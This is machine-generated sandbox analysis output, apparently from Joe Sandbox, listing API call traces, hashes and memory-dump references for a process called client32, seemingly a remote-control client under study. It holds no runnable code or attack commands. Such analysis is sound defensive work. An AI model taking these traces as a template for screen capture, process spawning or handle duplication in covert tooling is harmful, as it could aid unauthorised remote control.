• Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
• Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
• Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
APIs
• __lock.LIBCMT ref: 11176045
  • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
  • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
  • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
• __tzset_nolock.LIBCMT ref: 11176056
  • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
  • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
  • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
  • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
  • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
  • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
• String ID:
• API String ID: 1828324828-0
• Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
• Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
• Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
• Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
APIs
  • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
  • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
• GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
• Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
• String ID:
• API String ID: 3768737497-0
• Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
• Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
• Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
• Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LockitLockit::_std::_
• String ID:
• API String ID: 3382485803-0
• Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
• Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
• Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
• Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
APIs
• RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
• Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
• Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
• Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
• Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
• Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
• Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
APIs
• RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AllocateHeap__getptd_noexit
• String ID:
• API String ID: 328603210-0
• Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
• Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
• Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
• Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __waccess_s
• String ID:
• API String ID: 4272103461-0
• Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
• Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
• Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
• Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __fsopen
• String ID:
• API String ID: 3646066109-0
• Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
• Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
• Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
• Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                APIs
                                                                                  • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                  • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                                • SetCursor.USER32(00000000), ref: 110077F1
                                                                                • GetDC.USER32(?), ref: 1100781D
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                  • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                  • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                  • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                • DeleteDC.GDI32(?), ref: 110079FA
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                                • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                  • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                  • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                  • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                  • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                  • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                  • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                  • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                  • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                  • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                  • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                  • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                  • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                  • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                  • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                  • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • _memset.LIBCMT ref: 11007BC7
                                                                                • _swscanf.LIBCMT ref: 11007C34
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                • _memset.LIBCMT ref: 11007C8C
                                                                                • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                                • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                • UpdateWindow.USER32(?), ref: 11007EF2
                                                                                • SetCursor.USER32(?), ref: 11007EFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2635354838-2303488826
                                                                                • Opcode ID: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                • Opcode Fuzzy Hash: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 11127400
                                                                                • _memset.LIBCMT ref: 1112741D
                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                • _strrchr.LIBCMT ref: 111274AA
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                                • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                                • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                • wsprintfA.USER32 ref: 11127561
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                                • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                • _strrchr.LIBCMT ref: 111276AB
